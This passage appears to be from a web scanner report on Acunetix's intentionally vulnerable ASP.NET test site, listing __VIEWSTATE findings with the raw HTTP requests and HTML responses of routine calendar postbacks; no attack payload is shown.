href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1173 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,173 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8346&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgDAgQNTwNoIZGRk2nzOdh7ylVk%2FeyJ5RY%2BjJ0hxt08%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLc8%2FmGDwLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA461%2BEquVTnRfj4pmDApq2nitNhc
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:00:04 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgDAgQNTwNoIZGRk2nzOdh7ylVk/eyJ5RY+jJ0hxt08=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLc8/mGDwLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA461+EquVTnRfj4pmDApq2nitNhc" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:White" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8350&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgDAKK13w9oIZGRkR8mX75l56ehgBjrNC4T15ZmoD%2BE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLQx5HFCgLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA6Du71WtZiuZiS7cH4vRS0fYRRvt
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:11:39 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgDAKK13w9oIZGRkR8mX75l56ehgBjrNC4T15ZmoD+E=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLQx5HFCgLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA6Du71WtZiuZiS7cH4vRS0fYRRvt" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:White" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a 